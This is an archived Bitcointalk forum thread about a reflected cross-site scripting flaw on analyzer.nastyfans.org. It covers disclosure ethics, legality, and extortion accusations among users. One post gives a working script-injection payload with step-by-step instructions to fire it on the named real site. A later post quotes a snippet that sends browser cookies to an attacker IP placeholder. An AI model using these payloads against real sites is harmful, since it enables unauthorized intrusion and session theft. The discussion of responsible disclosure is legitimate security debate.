Bitcoin Forum

Other => Archival => Topic started by: Boris007 on June 18, 2020, 05:51:18 AM



Title: --
Post by: Boris007 on June 18, 2020, 05:51:18 AM
--


Title: Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
Post by: Vod on June 18, 2020, 05:57:37 AM
Good on you for exposing this before some hacker took advantage.

OG has been reminding me how I couldn't secure my hobby site, and he makes the same mistake while holding other people's coin.  :/


Title: Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
Post by: ChuckBuck on June 18, 2020, 01:18:40 PM
I am curious to know what OG will do after this thread  :D I am also concerned that if what OP says really exists, has anyone taken advantage of it? Specifically this
A malicious person can inject a shell script and get the personal deposit address of respected accounts, email..etc along with server information. If the website as claimed to operate 1000s of BTC then the vulnerability is intensified.

OG has been reminding me how I couldn't secure my hobby site, and he makes the same mistake while holding other people's coin.  :/
I thought that you and OG weren't really close, there was some conflict between you and him. Are you still talking to each other?  :D


Title: Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
Post by: Boris007 on June 18, 2020, 01:55:19 PM
I am curious to know what OG will do after this thread  :D I am also concerned that if what OP says really exists, has anyone taken advantage of it? Specifically this
A malicious person can inject a shell script and get the personal deposit address of respected accounts, email..etc along with server information. If the website as claimed to operate 1000s of BTC then the vulnerability is intensified.

Why don't you try it yourself??

1. Go to: https://analyzer.nastyfans.org/?s=1

2. Inside the search, paste:  
Code:
"><script>alert('Boris007 was here')</script>

3. Press submit and see the XXS being execute.
___________________________________________________

You simply cannot go to every search button and paste the script to check if the pop up comes or not, you need to dig inside the code to find if there is any reflected parameter or not, how does the sanitizer for the current website works..etc.

That is why I pasted so many screenshots as I was doing research on the website for the vulnerability bounty, but all in vain.

So far what I have tried on bitcointalk, believe me bitcointalk has some of great script protection. I have tried a lot to execute all kinds of XSS but it blocks me. I hope theymos is paying too much to cloudflare.
Bitcointalk has some smart sanitization for every input but just not for merit where 1ds as merit amount will surely let you spend 1 merit but ds1 won't.
On top of all, it is the attitude of a person, theymos has always entertained me for any problem that I have ever reported to me, unlike saying don't tell me I don't operate the site.


Title: Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
Post by: suchmoon on June 18, 2020, 02:36:24 PM
I am also concerned that if what OP says really exists, has anyone taken advantage of it?

It does exist. To take advantage of it the attacker would have to coerce someone to visit attacker's site and nastyfans site at the same time (in the same browser session) and obviously have JS enabled. This is a serious hole. I hope there are e-mail confirmations or 2FA for any withdrawals etc.


Title: Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
Post by: Boris007 on June 18, 2020, 02:42:16 PM
I am also concerned that if what OP says really exists, has anyone taken advantage of it?

It does exist. To take advantage of it the attacker would have to coerce someone to visit attacker's site and nastyfans site at the same time (in the same browser session) and obviously have JS enabled. This is a serious hole. I hope there are e-mail confirmations or 2FA for any withdrawals etc.

Nastyfans is vulnerable to  CWE 601 (https://cwe.mitre.org/data/definitions/601.html) open redirect vulnerability too.

To anawer your question , tgey dont have 2fa or even a email.confirmation system.


Title: Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
Post by: ChuckBuck on June 18, 2020, 03:54:08 PM
To take advantage of it the attacker would have to coerce someone to visit attacker's site and nastyfans site at the same time (in the same browser session) and obviously have JS enabled.
It seems that I lack knowledge about this, can you explain it more clearly? How can that be? Something called coerce? It is really difficult to force someone to do what the attacker wants, unless they have tricks to cover the user's eyes. Right?  ::)


Title: Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
Post by: bob123 on June 18, 2020, 05:54:29 PM
Effect:

A malicious person can inject a shell script and get the personal deposit address of respected accounts, email..etc along with server information. If the website as claimed to operate 1000s of BTC then the vulnerability is intensified.

What you have shown is "just" a reflected XSS, not a persistent one.
You would need to send the URL with the injected code as a parameter to a person. That person would need to click on that link and have JS enabled for the script to be executed.

You can't inject a script into the server this way. And you definitely can't steal data from the server with this method.



It does exist. To take advantage of it the attacker would have to coerce someone to visit attacker's site and nastyfans site at the same time (in the same browser session) and obviously have JS enabled. This is a serious hole. I hope there are e-mail confirmations or 2FA for any withdrawals etc.

This still depends on whether and how the same-origin-policy is implemented.


Title: Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
Post by: suchmoon on June 18, 2020, 06:08:06 PM
It seems that I lack knowledge about this, can you explain it more clearly? How can that be? Something called coerce? It is really difficult to force someone to do what the attacker wants, unless they have tricks to cover the user's eyes. Right?  ::)

It's all explained in great detail here (https://www.youtube.com/watch?v=ub82Xb1C8os).

This still depends on whether and how the same-origin-policy is implemented.

True. It's not quite as simple as I made it sound.


Title: Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
Post by: Vod on June 18, 2020, 10:41:14 PM
Very sloppy work.   While spending a few minutes, I clicked on his analyzer link, and it nicely analyzed some of the projects he was involved with over the years.

http://www.uberbills.com/


Title: Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
Post by: nutildah on June 19, 2020, 02:17:47 PM
It seems that I lack knowledge about this, can you explain it more clearly? How can that be? Something called coerce? It is really difficult to force someone to do what the attacker wants, unless they have tricks to cover the user's eyes. Right?  ::)

It's all explained in great detail here (https://www.youtube.com/watch?v=ub82Xb1C8os).

That's a decent explanation but I prefer this one (https://www.youtube.com/watch?v=cSAp9sBzPbc). You have to listen to at least 40 seconds of it to get its full implication.


Title: Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
Post by: Quickseller on June 19, 2020, 05:29:42 PM
Did you responsibly disclose the vulnerability to the site owner? Or did you first publish this report publicly?


Title: Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
Post by: NotATether on June 19, 2020, 05:48:21 PM
Did you responsibly disclose the vulnerability to the site owner? Or did you first publish this report publicly?

Do we know who is administrating the nastyfans.org site right now? The NastyFans service is being run by OgNasty but his thread says someone else made that website:

Bitcointalk user nonnakip (https://bitcointalk.org/index.php?action=profile;u=69046) has started a website for NastyFans (https://www.nastyfans.org) where members can trade seats using an auction.

nonnakip has been inactive since last April so I'm not sure whether he's still managing the site today.


Title: Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
Post by: Quickseller on June 19, 2020, 05:58:34 PM
The analyzer site appears to be run by naypalm who was active in the last week.

In any case, I don’t think someone not logging in for a long time is a reason to not make an attempt to disclose the vulnerability, even if they don’t actually receive the message or act on it.


Title: Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
Post by: Vod on June 19, 2020, 11:10:26 PM
Did you responsibly disclose the vulnerability to the site owner? Or did you first publish this report publicly?

Do we know who is administrating the nastyfans.org site right now? The NastyFans service is being run by OgNasty but his thread says someone else made that website:

Bitcointalk user nonnakip (https://bitcointalk.org/index.php?action=profile;u=69046) has started a website for NastyFans (https://www.nastyfans.org) where members can trade seats using an auction.

nonnakip has been inactive since last April so I'm not sure whether he's still managing the site today.

I sent a PM to naypalm last night, in case he is not aware of this thread.


Title: Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
Post by: hacker1001101001 on June 20, 2020, 05:48:21 AM
Did you responsibly disclose the vulnerability to the site owner? Or did you first publish this report publicly?

This question still matter's as it's not good look or practice at testing vulnerabilities on such website's without the owner's knowledge.

OP should have atleast notified OgNasty before injecting any scripts.


Title: Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
Post by: bob123 on June 20, 2020, 08:44:54 AM
Did you responsibly disclose the vulnerability to the site owner? Or did you first publish this report publicly?

According to this:

Why don't you try it yourself??
1. Go to: https://analyzer.nastyfans.org/?s=1
2. Inside the search, paste:   
Code:
"><script>alert('Boris007 was here')</script>
3. Press submit and see the XXS being execute.

I believe he initially posted it here and calls that a "responsible disclosure".

I wonder whether he got the permission to look for vulnerabilities from the server owner/administrator and hoster.



This question still matter's as it's not good look or practice at testing vulnerabilities on such website's without the owner's knowledge.

OP should have atleast notified OgNasty before injecting any scripts.

It is not just "not good", but illegal.


Title: Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
Post by: Boris007 on June 20, 2020, 09:16:05 AM
Did you responsibly disclose the vulnerability to the site owner? Or did you first publish this report publicly?

According to this:

Why don't you try it yourself??
1. Go to: https://analyzer.nastyfans.org/?s=1
2. Inside the search, paste:   
Code:
"><script>alert('Boris007 was here')</script>
3. Press submit and see the XXS being execute.

I believe he initially posted it here and calls that a "responsible disclosure".

I wonder whether he got the permission to look for vulnerabilities from the server owner/administrator and hoster.



This question still matter's as it's not good look or practice at testing vulnerabilities on such website's without the owner's knowledge.

OP should have atleast notified OgNasty before injecting any scripts.

It is not just "not good", but illegal.
The requested person was informed before disclosing it here.


Title: Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
Post by: Vod on June 20, 2020, 09:51:01 AM
OP should have atleast notified OgNasty before injecting any scripts.

Is that an objective standard?  A hacker's opinion?  Or maybe just mutual respect and consideration? 

OP could have done damage if he wanted - or sold the info.  He did the moral thing, and there is nothing illegal about it.



Title: Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
Post by: bob123 on June 20, 2020, 11:46:01 AM
The requested person was informed before disclosing it here.

That's not responsible disclosure.

How much time did you give him to fix any vulnerabilities before publicly disclose them?



OP should have atleast notified OgNasty before injecting any scripts.

Is that an objective standard?  A hacker's opinion?  Or maybe just mutual respect and consideration? 

OP could have done damage if he wanted - or sold the info.  He did the moral thing, and there is nothing illegal about it.

Without the approval of the owner of the site and the hoster, it definitely is illegal. Depending on the country, maybe "just" a gray area.
You can't just start doing pentests on any website/service you encounter.


Title: Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
Post by: hacker1001101001 on June 20, 2020, 12:16:51 PM
OP should have atleast notified OgNasty before injecting any scripts.

Is that an objective standard?  A hacker's opinion?  Or maybe just mutual respect and consideration? 

Nothing of that sort, it's just called ethics.


Title: Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
Post by: Harlot on June 20, 2020, 05:24:05 PM
The requested person was informed before disclosing it here.

That's not responsible disclosure.

How much time did you give him to fix any vulnerabilities before publicly disclose them?



OP should have atleast notified OgNasty before injecting any scripts.

Is that an objective standard?  A hacker's opinion?  Or maybe just mutual respect and consideration? 

OP could have done damage if he wanted - or sold the info.  He did the moral thing, and there is nothing illegal about it.

Without the approval of the owner of the site and the hoster, it definitely is illegal. Depending on the country, maybe "just" a gray area.
You can't just start doing pentests on any website/service you encounter.

bob123 is right on this one, OP just by trying to alter anything on nastfans' website without any kind of permission to the owner can be considered as hacking in itself. It doesn't matter if OP has good intentions or not, someone else's property (nastyfan website) was altered/tested by someone who doesn't have any kind of permission too. Posting this earlier without any kind of replies back from either OGnasty or nonnakip is also a bad move made in his part frankly the OP didn't do any kind of good intention by posting this right away.


Title: Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
Post by: Vod on June 21, 2020, 12:20:09 AM
You can't just start doing pentests on any website/service you encounter.

Of course you can.  Justice takes "intent" into account. It's not against the law to break into a house unless you intend to do something illegal.

If he doesn't want visitors to his website, he should take it offline. 


Title: Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
Post by: Steamtyme on June 21, 2020, 01:21:15 PM
It's not against the law to break into a house unless you intend to do something illegal.
That's absurd. The law is literally "Breaking and Entering" which would be broken as they did so with the intent to commit an offence. Trespassing would fit this as well, if we want to use silly comparisons for this matter. Wouldn't it have made more sense to look at Computer Crime Laws to attempt to defend OP.

I read this a few days ago, and first thought was probably should have posted this well after contacting OG about it. Maybe even posting in conjunction. Should have probably stated you were going to perform test before going ahead and doing so. I don't know shit about website design and security so I can't speak to much else here apart from general courtesies and socially acceptable practices.


Title: Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
Post by: Vod on June 21, 2020, 02:56:49 PM
It's not against the law to break into a house unless you intend to do something illegal.
That's absurd. The law is literally "Breaking and Entering" which would be broken as they did so with the intent to commit an offence.

Your legal system would be a mess.  "I didn't B&E, the window was left open!"  :)

I'll give you some examples:
- enter a house for protection/shelter/aid or other emergency - not a crime
- enter a house you thought was abandoned to smoke weed - trespassing
- go into an understaffed hospital ward to gather supplies - B&E

The "break" is not literal.   





Title: Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
Post by: khaled0111 on June 21, 2020, 03:25:32 PM
@Vod, I don't get your logic here.
What could be the intent behind pentesting and scanning a website without the consent of its owner!
and why did he disclose the vulnerability publicly before it got patched!
Maybe OP's intentionts are good, but by doing this, isn't he just making things easier for hackers?


Title: Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
Post by: OgNasty on June 21, 2020, 07:04:25 PM
The Minted Seat Analyzer is a 3rd party site run by naypalm. This was a poor extortion attempt targeting the wrong person.


Title: Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
Post by: Vod on June 21, 2020, 11:00:52 PM
This is a 3rd party site run by naypalm and has no functionality nor is it on the NastyFans server. It’s been broken for a long time. Maybe this will motivate naypalm to fix it. Nobody should be concerned by this. Just an idiot wasting his time and money on a poor attempt to extort me. The NastyFans server isn’t vulnerable.

Bottom line. No damage was done. This isn’t even the NastyFans server. This was a poor extortion attempt. The owner was not properly contacted before this was disclosed. This was very clearly a nefarious act, and a piss poor one at that.

No one extorted you,you idiot.    ::)

Edit:  Actually, I don't know that. OG - who contacted you about this and demanded money to not post it? Post their PMs and support your claim of extortion.   What I see is a new hacker trying to prove himself, and doing the right thing by not exploiting what he found.  I know nothing of him, but if I were in his shoes, I wouldn't respect a person who doesn't respect others. 

Warning to future ethical hackers:   Do not contact OG about vulnerabilities - he will accuse you of a crime.   



Title: Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
Post by: nonnakip on June 22, 2020, 08:44:21 AM
I just want to bring attention to that website https://nastyfans.org/ and https://analyzer.nastyfans.org/ are leaking security information and are vulnerable to script injection.

Leaking security information? Your plain text connection performs the leaking not the server. If nastyfans members go always to nastyfans.org to sign in then they will use TLS and the credentials will be secure.

I maintain nastyfans.org and have responsibility for the security on it.

analyzer.nastyfans.org is a different server and is maintains by naypalm. Users must always be careful of phishing attacks. This is not the first time his server has vulnerabilities. Perhaps it is unwise to allow analyzer.nastyfans.org to point to naypalm's server. Users can be misleading to think it is the nastyfans server.


Title: Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
Post by: bob123 on June 22, 2020, 10:17:08 AM
What I see is a new hacker trying to prove himself, and doing the right thing by not exploiting what he found.

He did exploit the vulnerability by creating the PoC popup.
There is not much more you can do with a reflected XSS on such a site. That's basically it.


Warning to future ethical hackers:   Do not contact OG about vulnerabilities - he will accuse you of a crime.   

An ethical hacker would not start to pentest a site/server without the permission of the owner and hoster.
It's more of a script kiddy move. And a pretty dumb one.


Title: Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
Post by: Boris007 on June 22, 2020, 10:29:57 AM
There is not much more you can do with a reflected XSS on such a site. That's basically it.
Well we can do, It depends.
How about transferring to p*rnhub.com or to your bitcointalk.org profile page instead of popup??


Title: Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
Post by: TECSHARE on June 22, 2020, 04:07:32 PM
These attacks on OGNasty are getting increasingly desperate. As others have pointed out, it is well established in the hacking community (white and grey hat) that you first notify the owners of a site/code before making a public release. This was unethical, and IMO intended as an attack against OGNasty.


Title: Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
Post by: Boris007 on June 22, 2020, 04:18:20 PM
These attacks on OGNasty are getting increasingly desperate. As others have pointed out, it is well established in the hacking community (white and grey hat) that you first notify the owners of a site/code before making a public release. This was unethical, and IMO intended as an attack against OGNasty.
I have no intention to attack someone personally.


Title: Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
Post by: OgNasty on June 22, 2020, 04:40:18 PM
An ethical hacker would not start to pentest a site/server without the permission of the owner and hoster.
It's more of a script kiddy move. And a pretty dumb one.

Yes, a script kiddy move to do it, and an attention whore move to try and publicize it as anything else. People should also take note of the merit sources who merited the behavior as they clearly showed bad judgement in doing so.


Title: Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
Post by: Vod on June 22, 2020, 06:43:45 PM
An ethical hacker would not start to pentest a site/server without the permission of the owner and hoster.
It's more of a script kiddy move. And a pretty dumb one.

Yes, a script kiddy move to do it, and an attention whore move to try and publicize it as anything else. People should also take note of the merit sources who merited the behavior as they clearly showed bad judgement in doing so.

So, who extorted you, you liar?   ::)

And what happened to the 2,600 BTC you owed your depositors when you collapsed your ponzi?

Stop playing the victim. 


Title: Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
Post by: Steamtyme on June 22, 2020, 07:07:44 PM
People should also take note of the merit sources who merited the behavior as they clearly showed bad judgement in doing so.
Not really. It's a well layed out and written OP. The subject was thorough and complete. These are the types of things that will get a post merited regardless of someone agreeing with or disagreeing with the idea.

Now if they are adding them to trust lists then that's where you would start to question someones judgment.


Title: Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
Post by: ChuckBuck on June 22, 2020, 08:07:49 PM
It's all explained in great detail here (https://www.youtube.com/watch?v=ub82Xb1C8os).

That's a decent explanation but I prefer this one (https://www.youtube.com/watch?v=cSAp9sBzPbc). You have to listen to at least 40 seconds of it to get its full implication.

Not only for 40 seconds, I had difficulty hearing. I mean I can write, but my listening skills are very bad, because I rarely communicate with people through this language, listening to a song is really harder than normal communication. I had to listen to so many times  ::) But anyway, I like the way you guys put a song here  :D

I'll give you some examples:
- enter a house for protection/shelter/aid or other emergency - not a crime
- enter a house you thought was abandoned to smoke weed - trespassing
- go into an understaffed hospital ward to gather supplies - B&E

The "break" is not literal.   
I will call it "dodge the law"  :D Here, we jokingly say that learning to dodge law  :D The law always has a loophole, if you understand it well, you can take advantage of it  :D


Title: Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
Post by: dragonvslinux on June 22, 2020, 11:51:07 PM
This is a 3rd party site run by naypalm and has no functionality nor is it on the NastyFans server. It’s been broken for a long time. Maybe this will motivate naypalm to fix it. Nobody should be concerned by this. Just an idiot wasting his time and money on a poor attempt to extort me. The NastyFans server isn’t vulnerable.

Bottom line. No damage was done. This isn’t even the NastyFans server. This was a poor extortion attempt. The owner was not properly contacted before this was disclosed. This was very clearly a nefarious act, and a piss poor one at that.

By the sound of it, either the user contacted you to disclose the vulnerability which you ignored as insignificant (I'll take your word for it) and this is what you considered extortion, or they didn't contact you in advance in an attempt to notify the owner and therefore there was no extortion. I'm a bit confused as to what actually occurred here, as many are claiming that they didn't attempt to notify the owner, whereas you appear to be claiming otherwise. You surely can't extort someone if you've already publicly published the findings.

OP, Boris007: did you contact OG before posting this, in an attempt to notify the owner? If this was the case, and Og ignored it, then they had the right to publish their findings. If the server isn't vulnerable anyway, there is no offence in the actions of the OP.  It's not breaking & entering if the house is already broken and the doors wide open :P

The "break" is not literal.  

This is true:

Burglary, also called breaking and entering and sometimes housebreaking, is illegally entering a building or other areas to do something illegal there.

Therefore there would be no damage caused in entry and nothing to steal or break, so just a bit of civil trespassing?
If this site was functional and there was vulnerability to user info, this would be a different story.



Edit: Just noticed the OP claiming:

The requested person was informed before disclosing it here.

End of story.


Title: Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
Post by: OgNasty on June 23, 2020, 12:37:38 AM
I am not the owner of the server. This doesn’t effect the NastyFans server. It effects the Uberbills server operated by naypalm and I don’t believe contact was properly made with him prior to any disclosure.


Title: Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
Post by: hacker1001101001 on June 23, 2020, 02:05:42 AM
Edit: Just noticed the OP claiming:

The requested person was informed before disclosing it here.

End of story.

Not yet !

Who was the person OP contacted with? Did he even knew the current owner of the website he is testing on and his contact info ? What is the use of making the vulnerability public ?

I don't think anyone/owner of the any website would just avoid acting on the vulnerability when reported. It's even unacceptable that someone denied to act on it once informed.


Title: Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
Post by: Boris007 on June 23, 2020, 02:25:02 AM
......I'm a bit confused as to what actually occurred here......
OP, Boris007: did you contact OG before posting this, in an attempt to notify the owner? If this was the case, and Og ignored it, then they had the right to publish their findings. If the server isn't vulnerable anyway, there is no offence in the actions of the OP....

So here is the gist of chat:

Me: Hi I found (XYZ) vulnerability, here is the POC.
OG: I don't run the particular site, BTW he has forwarded the message to nonakip.
Me: Is there any vulnerability bounty award ?? Can we disclose it in public??
OG: I don't run the mentioned site, so Boris007 must contact the naypalm.
Me: Thanks for clarifying that this is not your website.
I do not know who naypalm is and it seems he last logged a week back is very infrequent here.
So I would disclose the vulnerability to the forum(only).

--------------------------
ENd of PM
--------------------------

I don't know how it is extortion?? The thread Vod is a liar must change its title to Base64 (RFC 3548, RFC 4648) T2dOYXN0eQ== is a Liar.

Anyone who thinks I hate Og and created this thread, then answer is NO. I did not know who is OgNasty before a week back. I contacted him as I do with many services. He clearly says he doesn't own the site so I don't know how he comes in between. BTW thankyou for notifying this to naypalm on the very first day before this post.

Bottom line: What much one can do with reflected XSS? It is shit..and again one more shit reflected XSS by boris007 --Bob123456, Cat meow.
Top Line: https://www.dionach.com/blog/the-real-impact-of-cross-site-scripting/  --Security Community
_______________________________________________________________________________ ________

I believe that this thread is losing the path and now taking path hatred, Jealous, personal vendetta. I would close this thread after 12 hours. In case anyone has anything else than hatred and jealousy to post are do welcome.





Title: Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
Post by: Vod on June 23, 2020, 03:10:30 AM
So, OG lied when he cried extortion?  Not surprised.



Title: Re: [ CWE-79 ] *.nastyfans.org is vulnerable to script injection
Post by: bob123 on June 23, 2020, 09:17:37 AM
[...]
I do not know who naypalm is and it seems he last logged a week back is very infrequent here.
So I would disclose the vulnerability to the forum(only).

--------------------------
ENd of PM
--------------------------

So because he logs in infrequently you decided to publicly disclose it ?
Because you need the attention and can't wait a month or two for it to be fixed ?



Bottom line: What much one can do with reflected XSS? It is shit..and again one more shit reflected XSS by boris007 --Bob123456, Cat meow.
Top Line: https://www.dionach.com/blog/the-real-impact-of-cross-site-scripting/  --Security Community

All you can do is obviously to use the free version of the burp suite and make popups.
You found a reflected XSS, not a persistent one.

You like your low-level examples, i understood this already.

For example, this:
<script>
  image = new Image();
  image.src='https://[Attacker IP]:8080/?'+document.cookie;
</script>

This is only possible, if the HttpOnly flag is not set.
Otherwise the cookie can not be accessed by a script.

All you can do with that is to craft an own URL, and send it to someone to have the script being executed.

How would you exploit that on such a site, where no valuable or sensitive information is being stored/entered anyway?
Short answer: You can't.


You are obviously a script kiddy, breaking laws and being a dick, just to gain some attention.
You don't understand what you actually found and don't know how this could be exploited.